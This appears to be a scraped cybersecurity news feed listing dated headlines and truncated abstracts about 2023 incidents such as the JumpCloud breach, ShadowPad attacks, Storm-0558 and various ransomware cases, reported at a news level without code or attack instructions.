An analysis of the indicators of compromise ( IoCs ) associated with the JumpCloud hack has uncovered evidence pointing to the involvement of North Korean state-sponsored groups, in a style that's reminiscent of the supply chain attack targeting 3CX . The findings come from SentinelOne, which mapped out the infrastructure pertaining to the intrusion to uncover underlying patterns. It's worth noting that JumpCloud, last week, attributed the attack to an unnamed "sophisticated nation-state sponsored threat actor." "The North Korean threat actors demonstrate a high level of creativity and strategic awareness in their targeting strategies," SentinelOne security researcher Tom Hegel told The Hacker News. "The research findings reveal a successful and multifaceted approach employed by these actors to infiltrate developer environments." "They actively seek access to tools and networks that can serve as gateways to more extensive opportunitieThe Hacker News
July 19, 2023
DangerousPassword Attacks Targeting Developers’ Windows, macOS, and Linux Environments Full Text
Abstract
The targeted attack group DangerousPassword has been continuously attacking cryptocurrency exchange developers since June 2019, using malware that infects Windows, macOS, and Linux environments with Python and Node.js installed.Cyware
July 19, 2023
New Attack Campaign Enters the ‘FakeUpdates’ Arena to Deliver NetSupport RAT Full Text
Abstract
A new campaign called FakeSG, similar to SocGholish, is using hacked WordPress websites to distribute the NetSupport RAT and deliver additional payloads. FakeSG utilizes different layers of obfuscation and delivery techniques.Cyware
July 18, 2023
Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware Full Text
Abstract
An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad , a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews . Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and September 2022. The cybersecurity company said the incident could be the result of a supply-chain attack, in which a legitimate piece of software used by targets of interest is trojanized to deploy malware capable of gathering sensitive information from compromised systems. The attack chain takes the form of a malicious installer for E-Office , an application developed by the National Information Technology Board (NITB) of Pakistan to help government departments go paperless. It's currently not clear how the backdoored E-Office installer was delivered to the targets. That said, there&The Hacker News
July 18, 2023
Hacking campaign targets sites using WordPress WooCommerce Payments Plugin Full Text
Abstract
Threat actors are actively exploiting a critical flaw, tracked as CVE-2023-28121, in the WooCommerce Payments WordPress plugin. Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2023-28121 (CVSS score:...Security Affairs
July 18, 2023
JumpCloud revealed it was hit by a sophisticated attack by a nation-state actor Full Text
Abstract
Software firm JumpCloud announced it was the victim of a sophisticated cyber attack carried out by a nation-state actor. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless...Security Affairs
July 17, 2023
Hackers Target Pakistani Government, Bank, and Telecom Provider With China-Made Malware Full Text
Abstract
Cybersecurity firm Trend Micro identified three entities in Pakistan targeted by Shadowpad last year: an unnamed government agency, a state bank, and a telecommunications provider.Cyware
July 17, 2023
Hackers Target Reddit Alternative Lemmy via Zero-Day Vulnerability Full Text
Abstract
A few days ago, an attacker leveraged a cross-site scripting (XSS) vulnerability to deface pages on some popular instances, including Lemmy.world, the most popular instance, which has over 100,000 users.Cyware
July 14, 2023
TeamTNT’s Cloud Credential Stealing Campaign Now Targets Azure and Google Cloud Full Text
Abstract
A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform (GCP) services, marking the adversary's expansion in targeting beyond Amazon Web Services (AWS). The findings come from SentinelOne and Permiso , which said the "campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew," although it emphasized that "attribution remains challenging with script-based tools." They also overlap with an ongoing TeamTNT campaign disclosed by Aqua called Silentbob that leverages misconfigured cloud services to drop malware as part of what's said to be a testing effort, while also linking SCARLETEEL attacks to the threat actor, citing infrastructure commonalities. "TeamTNT is scanning for credentials across multiple cloud environments, including AWS, Azure, and GCP," Aqua noted. The attacks, which single out public-facing Docker instancThe Hacker News
July 14, 2023
Norwegian Refugee Council hit by cyberattack Full Text
Abstract
The NRC said it immediately suspended the database to protect the data and prevent further attacks. They also launched an external forensic investigation to determine the scope and impact of the cyberattack.Cyware
July 13, 2023
Tampa Bay Zoo Targeted in Cyberattack by Apparent Offshoot of Royal Ransomware Full Text
Abstract
One of the U.S.’s most popular zoos has been hit with a cyberattack involving the theft of employee and vendor information, and a likely offshoot of the Royal ransomware gang is taking credit.Cyware
July 12, 2023
Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments Full Text
Abstract
Microsoft on Tuesday revealed that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations, some of which include government agencies, in a cyber espionage campaign designed to acquire confidential data. The attacks, which commenced on May 15, 2023, entailed access to email accounts affecting approximately 25 entities and a small number of related individual consumer accounts. The tech giant attributed the campaign to Storm-0558, describing it as a nation-state activity group based out of China that primarily singles out government agencies in Western Europe. "They focus on espionage, data theft, and credential access," Microsoft said . "They are also known to use custom malware that Microsoft tracks as Cigril and Bling, for credential access." The breach is said to have been detected a month later on June 16, 2023, after an unidentified customer reported the anomalous email activity to the company. Microsoft saiThe Hacker News
July 12, 2023
Microsoft mitigated an attack by Chinese threat actor Storm-0558 Full Text
Abstract
Microsoft announced it has mitigated a cyber attack by a China-linked threat actor, tracked as Storm-0558, which targeted customer emails. Microsoft announced it has mitigated an attack conducted by a China-linked threat actor, tracked as Storm-0558,...Security Affairs
July 12, 2023
Unpatched Office zero-day CVE-2023-36884 actively exploited in targeted attacks Full Text
Abstract
Microsoft warned today that an unpatched zero-day in multiple Windows and Office products was actively exploited in the wild. Microsoft disclosed an unpatched zero-day vulnerability in multiple Windows and Office products that has been actively exploited...Security Affairs
July 11, 2023
Australian Infrastructure Company Ventia Hit With Cyberattack Full Text
Abstract
The Australian infrastructure services provider Ventia is dealing with a cyberattack that began this weekend. On Saturday, the company said it identified a cyber intrusion and took some “key systems” offline to contain the incident.Cyware
July 10, 2023
RomCom RAT attackers target groups supporting NATO membership of Ukraine Full Text
Abstract
Threat actors are targeting NATO and groups supporting Ukraine in a spear-phishing campaign distributing the RomCom RAT. On July 4, the BlackBerry Threat Research and Intelligence team uncovered a spear phishing campaign aimed at an organization...Security Affairs
July 10, 2023
RomCom RAT Targeting NATO and Ukraine Support Groups Full Text
Abstract
The threat actors behind the RomCom RAT have been suspected of phishing attacks targeting the upcoming NATO Summit in Vilnius as well as an identified organization supporting Ukraine abroad. The findings come from the BlackBerry Threat Research and Intelligence team, which found two malicious documents submitted from a Hungarian IP address on July 4, 2023. RomCom, also tracked under the names Tropical Scorpius, UNC2596, and Void Rabisu, was recently observed staging cyber attacks against politicians in Ukraine who are working closely with Western countries and a U.S.-based healthcare organization involved with aiding refugees fleeing the war-torn country. Attack chains mounted by the group are geopolitically motivated and have employed spear-phishing emails to point victims to cloned websites hosting trojanized versions of popular software. Targets include militaries, food supply chains, and IT companies. The latest lure documents identified by BlackBerry impersonate UkrainiaThe Hacker News
July 07, 2023
JumpCloud Resets API Keys Amid Ongoing Cybersecurity Incident Full Text
Abstract
JumpCloud, a provider of cloud-based identity and access management solutions, has swiftly reacted to an ongoing cybersecurity incident that impacted some of its clients. As part of its damage control efforts, JumpCloud has reset the application programming interface (API) keys of all customers affected by this event, aiming to protect their valuable data. The company has informed the concerned clients about the critical nature of this move, reinforcing its commitment to safeguarding their operations and organizations. This API key reset will, however, disrupt certain functionalities like AD import, HRIS integrations, JumpCloud PowerShell modules, JumpCloud Slack apps, Directory Insights Serverless apps, ADMU, third-party zero-touch MDM packages, Command Triggers, Okta SCIM integration, Azure AD SCIM integration, Workato, Aquera, Tray, and more. Despite the potential disruptions, JumpCloud maintains that the key reset is for the greater good of its clients. For those needing assisThe Hacker News
July 06, 2023
Silentbob Campaign: Cloud-Native Environments Under Attack Full Text
Abstract
Cybersecurity researchers have unearthed an attack infrastructure that's being used as part of a "potentially massive campaign" against cloud-native environments. "This infrastructure is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to deploy on exposed JupyterLab and Docker APIs in order to deploy Tsunami malware , cloud credentials hijack, resource hijack, and further infestation of the worm," cloud security firm Aqua said . The activity, dubbed Silentbob in reference to an AnonDNS domain set up by the attacker, is said to be linked to the infamous cryptojacking group tracked as TeamTNT , citing overlaps in tactics, techniques, and procedures (TTPs). However, the involvement of an "advanced copycat" hasn't been ruled out. Aqua's investigation was prompted in the aftermath of an attack targeting its honeypot in early June 2023, leading to the discovery of four malicious contThe Hacker News
July 5, 2023
European Entities Targeted in SmugX Campaign Full Text
Abstract
Check Point spotted a new campaign by a Chinese threat actor targeting diplomatic entities in Europe. Dubbed SmugX, the campaign uses HTML smuggling to deploy a new variant of PlugX RAT. The campaign reportedly overlaps with the activity of RedDelta and Mustang Panda. Organizations are advised to u ... Read MoreCyware
July 5, 2023
The Port of Nagoya, the largest Japanese port, suffered a ransomware attack Full Text
Abstract
The Port of Nagoya, the largest port in Japan, suffered a ransomware attack that severely impacted its operations. The Port of Nagoya, in the Ise Bay, is the largest and busiest trading port in Japan, accounting for about 10% of the total trade value...Security Affairs
July 3, 2023
GCHQ reveals British government was hacked by foreign cyber spies 20 years ago Full Text
Abstract
This month marks the 20th anniversary of the first time cyber experts at GCHQ responded to a foreign state hacking the British government, the intelligence and security agency revealed on Friday.Cyware
July 3, 2023
Hacks targeting British exam boards raise fears of students cheating Full Text
Abstract
Police in Britain are investigating multiple incidents in which national exam papers for school-leavers were stolen by hackers and sold online to students seeking to cheat on their tests.Cyware
July 3, 2023
GuLoader Campaign Targets Law Firms in the US Full Text
Abstract
The GuLoader malware campaign utilizes a multi-stage infection chain, including a PDF lure, a GuLoader VBScript, and obfuscated Powershell scripts, to deliver the Remcos RAT.Cyware
July 2, 2023
WordPress sites using the Ultimate Member plugin are under attack Full Text
Abstract
Threat actors are exploiting a critical WordPress zero-day in the Ultimate Member plugin to create secret admin accounts. Hackers are actively exploiting a critical unpatched WordPress Plugin flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), to create...Security Affairs
June 29, 2023
8Base Ransomware Activity Spikes, Researcher Warn Full Text
Abstract
Ransomware threat 8Base has been conducting double extortion attacks for over a year and its activities spiked suddenly in May and June 2023. 8Base has been connected to 67 attacks by Malwarebytes and NCC Group. Approximately 50% of the targeted victims belong to the business services, manufacturin ... Read MoreCyware
June 28, 2023
Using Electromagnetic Fault Injection Attacks to take over drones Full Text
Abstract
Electromagnetic fault injection (EMFI) attacks on drones can potentially allow attackers to achieve arbitrary code execution and take over them. While the use of drones continues to grow, researchers from IOActive analyzed how to develop fault injection...Security Affairs
June 27, 2023
New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain Full Text
Abstract
Cybersecurity researchers have discovered a new ongoing campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems. "The packages in question seem to be published in pairs, each pair working in unison to fetch additional resources which are subsequently decoded and/or executed," software supply chain security firm Phylum said in a report released last week. To that end, the order in which the pair of packages are installed is paramount to pulling off a successful attack, as the first of the two modules are designed to store locally a token retrieved from a remote server. The campaign was first discovered on June 11, 2023. The second package subsequently passes this token as a parameter alongside the operating system type to an HTTP GET request to acquire a second script from the remote server. A successful execution returns a Base64-encoded string that is immediately executed but only if that string isThe Hacker News
June 27, 2023
Senior Choice, Inc. Provides Notice of Security Incident Full Text
Abstract
The company, which manages three residential facilities in Pennsylvania, discovered suspicious activity in its internal systems used for business operations and immediately implemented measures to contain the situation.Cyware
June 27, 2023
Schneider Electric and Siemens Energy are two more victims of a MOVEit attack Full Text
Abstract
Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial...Security Affairs
June 26, 2023
Japanese Cryptocurrency Exchange Falls Victim to JokerSpy macOS Backdoor Attack Full Text
Abstract
An unknown cryptocurrency exchange located in Japan was the target of a new attack earlier this month to deploy an Apple macOS backdoor called JokerSpy. Elastic Security Labs, which is monitoring the intrusion set under the name REF9134 , said the attack led to the installation of Swiftbelt, a Swift-based enumeration tool inspired by an open-source utility called SeatBelt . JokerSky was first documented by Bitdefender last week, describing it as a sophisticated toolkit designed to breach macOS machines. Very little is known about the threat actor behind the operation other than the fact that the attacks leverage a set of programs written in Python and Swift that come with capabilities to gather data and execute arbitrary commands on compromised hosts. A primary component of the toolkit is a self-signed multi-architecture binary known as xcc that's engineered to check for FullDiskAccess and ScreenRecording permissions. The file is signed as XProtectCheck, indicating anThe Hacker News
June 26, 2023
Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada Full Text
Abstract
The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada's leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas,...Security Affairs
June 26, 2023
Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers Full Text
Abstract
Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard. The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said. Midnight Blizzard, formerly known as Nobelium , is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes. The group , which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities. It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area. "These credential attacks usThe Hacker News
June 20, 2023
Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer Full Text
Abstract
A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer . "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News. Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia. In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection. A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads. One of the sub-folders in questionThe Hacker News
June 16, 2023
Oil and gas giant Shell is another victim of Clop ransomware attacks Full Text
Abstract
British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign...Security Affairs
June 15, 2023
Barracuda ESG zero-day exploited by China-linked APT Full Text
Abstract
Experts linked the UNC4841 threat actor behind the attacks exploiting the recently patched Barracuda ESG zero-day to China. Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day...Security Affairs
June 15, 2023
New Supply Chain Attack Exploits Abandoned S3 Buckets to Distribute Malicious Binaries Full Text
Abstract
In what's a new kind of software supply chain attack aimed at open source projects, it has emerged that threat actors could seize control of expired Amazon S3 buckets to serve rogue binaries without altering the modules themselves. "Malicious binaries steal the user IDs, passwords, local machine environment variables, and local host name, and then exfiltrates the stolen data to the hijacked bucket," Checkmarx researcher Guy Nachshon said. The attack was first observed in the case of an npm package called bignum , which, until version 0.13.0, relied on an Amazon S3 bucket to download pre-built binary versions of an addon named node-pre-gyp during installation. "These binaries were published on a now-expired S3 bucket which has since been claimed by a malicious third party which is now serving binaries containing malware that exfiltrates data from the user's computer," according to a GitHub advisory published on May 24, 2023. An unknown threat actorThe Hacker News
June 15, 2023
Microsoft Links Data Wiping Attacks on Ukraine to New Russian Threat Actor Full Text
Abstract
The computing giant dubbed the threat actor Cadet Blizzard and said it's distinct from other well-known Russian military intelligence hacking groups, such as Sandworm and APT28, which is also known as Fancy Bear.Cyware
June 14, 2023
Unveiling the Balada injector: a malware epidemic in WordPress Full Text
Abstract
Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion. A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress...Security Affairs
June 14, 2023
New Research Shows Potential of Electromagnetic Fault Injection Attacks Against Drones Full Text
Abstract
New research shows the potential of electromagnetic fault injection (EMFI) attacks against unmanned aerial vehicles, with experts showing how drones that don’t have any known vulnerabilities could be hacked.Cyware
June 13, 2023
Adversary-in-the-Middle Attack Campaign Hits Dozens of Global Organizations Full Text
Abstract
"Dozens" of organizations across the world have been targeted as part of a broad business email compromise ( BEC ) campaign that involved the use of adversary-in-the-middle ( AitM ) techniques to carry out the attacks. "Following a successful phishing attempt, the threat actor gained initial access to one of the victim employee's account and executed an 'adversary-in-the-middle' attack to bypass Office365 authentication and gain persistence access to that account," Sygnia researchers said in a report shared with The Hacker News. "Once gaining persistence, the threat actor exfiltrated data from the compromised account and used his access to spread the phishing attacks against other victim's employees along with several external targeted organizations." The findings come less than a week after Microsoft detailed a similar combination of an AitM phishing and a BEC attack aimed at banking and financial services organizations. BEC scamThe Hacker News
June 11, 2023
Pro-Ukraine Cyber Anarchy Squad claims the hack of the Russian telecom provider Infotel JSC Full Text
Abstract
Pro-Ukraine hackers Cyber Anarchy Squad claimed responsibility for the attack that hit Russian telecom provider Infotel JSC. Pro-Ukraine hacking group Cyber.Anarchy.Squad claimed responsibility for an attack on Russian telecom provider Infotel JSC....Security Affairs
June 9, 2023
University of Manchester Announces Cyber Incident, Says Data ‘Likely’ Copied Full Text
Abstract
The University of Manchester, one of the largest universities in the United Kingdom by enrollment, announced on Friday that it was the victim of a cyber incident and that the hackers had accessed and “likely” copied data.Cyware
June 8, 2023
Aix-Marseille, France’s largest university, hit by cyberattack Full Text
Abstract
The institution’s management described the attack as coming “from a foreign country” but said its security systems triggered an alert allowing them to take the network offline before “great damage” was caused.Cyware
June 08, 2023
Kimsuky Targets Think Tanks and News Media with Social Engineering Attacks Full Text
Abstract
The North Korean nation-state threat actor known as Kimsuky has been linked to a social engineering campaign targeting experts in North Korean affairs with the goal of stealing Google credentials and delivering reconnaissance malware. "Further, Kimsuky's objective extends to the theft of subscription credentials from NK News," cybersecurity firm SentinelOne said in a report shared with The Hacker News. "To achieve this, the group distributes emails that lure targeted individuals to log in on the malicious website nknews[.]pro, which masquerades as the authentic NK News site. The login form that is presented to the target is designed to capture entered credentials." NK News , established in 2011, is an American subscription-based news website that provides stories and analysis about North Korea. The disclosure comes days after U.S. and South Korean intelligence agencies issued an alert warning of Kimsuky's use of social engineering tactics to strikThe Hacker News
June 7, 2023
Ukraine Warns Against Cyberespionage Campaign Planting LonePage Malware on Targeted Systems Full Text
Abstract
Volodymyr Kondrashov, spokesperson for Ukraine's State Service of Special Communications and Information Protection tweeted Tuesday the campaign targets Microsoft Windows machines used by government agencies and media organizations.Cyware
June 6, 2023
Update: Augusta not in contact with ransomware group behind attack, mayor says Full Text
Abstract
In a statement on Friday, the office of Augusta Mayor Garnett Johnson said it has continued to work with the city’s IT team and outside security specialists to address the cyberattack that started on May 21.Cyware
June 5, 2023
Australian cyber-op attacked ISIL with zero-click exploit Full Text
Abstract
The documentary, BREAKING the CODE: Cyber Secrets Revealed, reveals that the Australian Signals Directorate developed three payloads it could deploy to ISIL fighters' smartphones and PCs "without ISIL having to interact with the device in any way."Cyware
June 4, 2023
Void Rabisu Group Uses RomCom for Geopolitical Attacks Full Text
Abstract
Researchers shed light on evolving objectives of the Void Rabisu hacking group as they uncovered a campaign that used a fake version of the Ukrainian army’s Delta situational awareness website to lure targets into installing the RomCom backdoor. While their previous operations were centered on data ... Read MoreCyware
June 4, 2023
Xplain hack impacted the Swiss cantonal police and Fedpol Full Text
Abstract
Several Swiss cantonal police, the army, customs and the Federal Office of Police (Fedpol) were impacted by the attack against IT firm Xplain. Swiss police launched an investigation into the cyber attack that hit the Bernese IT company...Security Affairs
June 3, 2023
Hackers Exploit Barracuda ESG Zero-Day Flaw to Backdoor Malware Full Text
Abstract
Barracuda has disclosed information about a recent attack campaign that exploits a zero-day vulnerability in its ESG appliances to deploy three different malware strains. The CISA added the flaw to its KEV catalog last week, urging federal agencies to apply the patches by June 16.Cyware
June 2, 2023
New Horabot Campaign Targets Spanish-Speaking Users in the Americas Full Text
Abstract
Horabot enables the threat actor to control the victim’s Outlook mailbox, exfiltrate contacts’ email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim’s mailbox.Cyware
June 1, 2023
BlackCat claims the hack of the Casepoint legal technology platform used by US agencies Full Text
Abstract
The BlackCat ransomware gang claims to have hacked the Casepoint legal technology platform used US agencies, including SEC and FBI. The cybersecurity researcher Dominic Alvieri first noticed that the BlackCat ransomware gang added the company Casepoint...Security Affairs
May 30, 2023
BrutePrint Attack allows to unlock smartphones with brute-forcing fingerprint Full Text
Abstract
Researchers devised an attack technique, dubbed BrutePrint Attack, that allows brute-forcing fingerprints on smartphones to bypass authentication. Researchers have devised an attack technique, dubbed BrutePrint, that allows to brute-force fingerprints...Security Affairs
May 27, 2023
Update: Latitude Financial Attack Costs Company Up to $68.5 Million Full Text
Abstract
Latitude was able to process transactions during the incident, but "account originations and collections were closed or severely restricted." The company has since fully recovered, it says.Cyware
May 26, 2023
WinTapix Attack Campaign Targets Middle East Nations Full Text
Abstract
An unidentified threat actor group has been observed employing a malicious Windows kernel driver in targeted attacks, primarily focusing on the Middle East region. Fortinet security experts have dubbed the artifact as WINTAPIX (WinTapix.sys). To stay protected, users are suggested to immediately im ... Read MoreCyware
May 25, 2023
Alert: Brazilian Hackers Targeting Users of Over 30 Portuguese Banks Full Text
Abstract
A Brazilian threat actor is targeting more than 30 Portuguese financial institutions with information-stealing malware as part of a long-running campaign that commenced in 2021. "The attackers can steal credentials and exfiltrate users' data and personal information, which can be leveraged for malicious activities beyond financial gain," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a new report shared with The Hacker News. The cybersecurity firm, which began tracking "Operation Magalenha" earlier this year, said the intrusions culminate in the deployment of two variants of a backdoor called PeepingTitle so as to "maximize attack potency." The links to Brazil stem from the use of the Brazilian-Portuguese language within the detected artifacts as well as source code overlaps with another banking trojan known as Maxtrilha , which was first disclosed in September 2021. PeepingTitle, like Maxtrilha, is written in the DelphiThe Hacker News
May 24, 2023
Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry Full Text
Abstract
At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack. Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell , which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "The infected sites collect preliminary user information through a script," ClearSky said in a technical report published Tuesday. Most of the impacted websites have been stripped of the rogue code. Tortoiseshell is known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. It has also been observed setting up fake hiring websites for U.S. military veterans in a bid to trick them into downloading remote access trojans. That said, this is not the first time Iranian activity clusters have set their sights on the Israeli shipping sector with waThe Hacker News
May 24, 2023
Cyber Attacks Strike Ukraine’s State Bodies in Espionage Operation Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting state bodies in the country as part of an espionage campaign. The intrusion set , attributed to a threat actor tracked by the authority as UAC-0063 since 2021, leverages phishing lures to deploy a variety of malicious tools on infected systems. The origins of the hacking crew are presently unknown. In the attack chain described by the agency, the emails targeted an unspecified ministry and purported to be from the Embassy of Tajikistan in Ukraine. It's suspected that the messages were sent from a previously compromised mailbox. The emails come attached with a Microsoft Word document that, upon enabling macros, launches an encoded VBScript called HATVIBE, which is then used to drop additional malware. This includes a keylogger (LOGPIE), a Python-based backdoor capable of running commands sent from a remote server (CHERRYSPY), and a tool focused on exfiltrating files with specific eThe Hacker News
May 23, 2023
German arms manufacturer Rheinmetall suffered Black Basta ransomware attack Full Text
Abstract
The German automotive and arms manufacturer Rheinmetall announced it was victim of a Black Basta ransomware attack that took place last month. Rheinmetall is a German automotive and arms manufacturer that is listed on the Frankfurt stock exchange....Security Affairs
May 23, 2023
Cyberespionage Campaign Targets Ukraine, Israel, India, Kazakhstan, and Other Nations Full Text
Abstract
Apart from targeting Ukrainian government entities, a threat actor identified by researchers as UAC-0063 “has also shown interest” in targeting Mongolia, Kazakhstan, Kyrgyzstan, Israel, and India, according to the report published on Monday.Cyware
May 21, 2023
PyPI Repository temporarily suspends user sign-ups and package uploads due to ongoing attacks Full Text
Abstract
The Python Package Index (PyPI) maintainers have temporarily disabled the sign up and package upload processes due to an ongoing attack. The maintainers of Python Package Index (PyPI), the Python software repository, have temporarily disabled the sign...Security Affairs
May 20, 2023
Mustang Panda Hijacks TP-Link Routers of European Foreign Affairs Entities Full Text
Abstract
European foreign affairs organizations are being targeted by a Chinese state-sponsored Camaro Dragon hacking group with a custom malware variant. This group has been found infecting residential TP-Link routers with a specialized malware called Horse Shell. Attackers can execute arbitrary commands, ... Read MoreCyware
May 19, 2023
February cyber incident will cost molten metal flow engineering firm Vesuvius £3.5 million Full Text
Abstract
Vesuvius, a leader in molten metal flow engineering and technology, revealed that the February cyber incident will cost it £3.5 million Vesuvius is a global leader in molten metal flow engineering and technology, it employs more than 10,000 people...Security Affairs
May 19, 2023
Dole incurs $10.5M in direct costs from February ransomware attack Full Text
Abstract
About $4.8 million of those costs were related to continuing operations. The attack had a limited overall impact on its operations, with the main disruption occurring in its fresh vegetables and Chilean business.Cyware
May 18, 2023
Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks Full Text
Abstract
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country. "From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report. The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023. Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics. What's more, the spike in malicious emails targeting Taiwan has been followed by a 15x increase in PlugX detections between April 10 and April 12, 2023,The Hacker News
May 18, 2023
China-Taiwan Tensions Spark Surge in Cyberattacks on Taiwan Full Text
Abstract
Trellix has observed a surge in malicious emails targeted toward Taiwan, starting April 7 and continuing until April 10. The number of malicious emails during this time increased to over four times the usual amount.Cyware
May 17, 2023
Franklin County Public Schools Hit by Ransomware Attack Full Text
Abstract
According to a statement from schools Superintendent Bernice Cobbs, the decision was made to cancel classes Monday in the interest of on-campus security as the impact of the cyberattack was being reviewed.Cyware
May 15, 2023
Researchers Uncover Powerful Backdoor and Custom Implant in Year-Long Cyber Campaign Full Text
Abstract
Government, aviation, education, and telecom sectors located in South and Southeast Asia have come under the radar of a new hacking group as part of a highly-targeted campaign that commenced in mid-2022 and continued into the first quarter of 2023. Symantec, by Broadcom Software, is tracking the activity under its insect-themed moniker Lancefly , with the attacks making use of a "powerful" backdoor called Merdoor. Evidence gathered so far points to the custom implant being utilized as far back as 2018. The ultimate goal of the campaign, based on the tools and the victimology pattern, is assessed to be intelligence gathering. "The backdoor is used very selectively, appearing on just a handful of networks and a small number of machines over the years, with its use appearing to be highly targeted," Symantec said in an analysis shared with The Hacker News. "The attackers in this campaign also have access to an updated version of the ZXShell rootkit."The Hacker News
May 12, 2023
Tennessee, Georgia colleges respond to cyberattacks as school year wraps up Full Text
Abstract
Tennessee’s Chattanooga State Community College has been responding to a cyberattack since Saturday, forcing the school to cancel classes on Monday and modify schedules for staff members. The school serves more than 11,000 students.Cyware
May 12, 2023
Bl00dy Ransomware Gang Strikes Education Sector with Critical PaperCut Vulnerability Full Text
Abstract
U.S. cybersecurity and intelligence agencies have warned of attacks carried out by a threat actor known as the Bl00dy Ransomware Gang that attempt to exploit vulnerable PaperCut servers against the education facilities sector in the country. The attacks took place in early May 2023, the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) said in a joint cybersecurity advisory issued Thursday. "The Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet," the agencies said . "Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files." CVE-2023-27350 is a now-patched critical security flaw affecting some versions of PaperCut MF aThe Hacker News
May 10, 2023
Cybersecurity firm Dragos shared details about a failed extortion attempt it suffered Full Text
Abstract
Industrial cybersecurity firm Dragos revealed that a ransomware group attempted to breach its infrastructure and extort it. Industrial cybersecurity firm Dragos revealed that on May 8, 2023, a known ransomware group attempted and failed to breach...Security Affairs
May 10, 2023
Smashing Pumpkins frontman paid ransom to a hacker who threatened to leak the band’s songs Full Text
Abstract
The frontman of the American alternative rock band Smashing Pumpkins, Billy Corgan, has revealed he paid hackers who stole the band's songs The frontman of the alternative rock band Smashing Pumpkins, Billy Corgan, revealed he paid a ransom after...Security Affairs
May 10, 2023
More Than 45,000 Affected by December Cyberattack on Metropolitan Opera Full Text
Abstract
The organization notified that the names, financial account information, tax identification numbers, Social Security numbers, payment card information, and driver’s license numbers of 45,094 people were leaked during the cyberattack.Cyware
May 09, 2023
Microsoft Warns of State-Sponsored Attacks Exploiting Critical PaperCut Vulnerability Full Text
Abstract
